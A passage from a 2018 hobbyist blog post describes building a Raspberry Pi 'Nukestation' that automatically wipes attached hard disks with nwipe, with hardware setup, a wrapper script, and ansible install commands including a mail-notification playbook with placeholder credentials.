that. I would prefer a small device with low energy consumption just for wiping. That's why I am going to build a "Nukestation". Basically it's just a Raspberry Pi with nwipe on it and a udev-rule for automatically wipe attached hard disks. But some extras would be nice...</p> <h3>Hardware</h3> <p>My setup is quite basic: a Raspberry Pi 3b+, a Disk-Docking-Station(USB), and a LED for signalling that the drive can safely removed/attached. I know, It would be much better to use a red LED for signalling when the Nukestation is wiping disks, but I had just green LED's at home. That's why I am gonna do that the way around.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/nukestation.mp4" type="video/mp4" /></video> </p> <p>This video shows my setup. As soon as I plugg in the harddisk, the green led turns dark for signalling that it is not safe to remove the disk now, and on the screen we can see that nwipe starts it's job.</p> <h3>Little Extras</h3> <p>I wrote a bash-script called "nukestation.sh". This script is a wrapper for nwipe and allows us to:</p> <ul> <li>Create Pre-run-hooks(like turn off the LED)</li> <li>Run nwipe with configurable settings</li> <li>Create Post-run-hoocks(like turn on the LED)</li> <li>Send a notification including the nwipe-log via email</li> </ul> <h3>Installation</h3> <p>I won't use this Raspberry Pi only for wiping disks. That's why I need a very easy to use installation routine for the nukestation. I used the configuration management sytem <a href="https://www.ansible.com/">ansible</a> for that. The sources of my nukestation ansible-role can be downloaded on <a href="https://github.com/whotwagner/ansible-role-nukestation">Github</a>&nbsp; and the role is available on ansible-galaxy too. On a freshly installed <a href="https://www.raspberrypi.org/downloads/raspbian/">Raspbian</a>&nbsp; the Nukestation can be installed using the follwing commands:</p> <pre> <code> $ sudo apt-get install ansible $ sudo ansible-galaxy install whotwagner.nukestation $ cat > playbook.yml << EOF --- - hosts: localhost roles: - whotwagner.nukestation EOF $ sudo ansible-playbook playbook.yml </code></pre> <p>The playbook above will just install Nukestation without mailsupport. If we want to install a mailsystem with a smarthost using authentication to automatically send notifications we can use another playbook:</p> <pre> <code> $ sudo apt-get install ansible $ sudo ansible-galaxy install whotwagner.nukestation $ cat > playbook.yml << EOF - hosts: localhost roles: - whotwagner.nukestation vars: nukestation_mailconf: server: mail.example.conf:587 user: username@example.conf pass: super-secret-password from: from@example.com to: to@example.com EOF $ sudo ansible-playbook playbook.yml </code></pre> <p>A detailed documentation about the playbook and the nukestation.sh-script can be found at <a href="https://github.com/whotwagner/ansible-role-nukestation">Github</a>.</p> <h3>Conclusio</h3> <p>Nukestation allows me to wipe disks easily and I'll recieve notifications as soon as the wipejob is finished. <em>"I love it when a plan comes together"</em></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Apr 15 2018</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/hackaday" hreflang="en">HackADay</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/hardware" hreflang="en">Hardware</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/raspberry" hreflang="en">Raspberry</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ansible" hreflang="en">Ansible</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=262&amp;2=comment&amp;3=comment" token="mXNkYhJywlpehAmSRx0Jlb3KcW68vS026m820TmEpE8"></drupal-render-placeholder> </section> Sun, 15 Apr 2018 16:45:24 +0000 Hoti 262 at https://tech.feedyourhead.at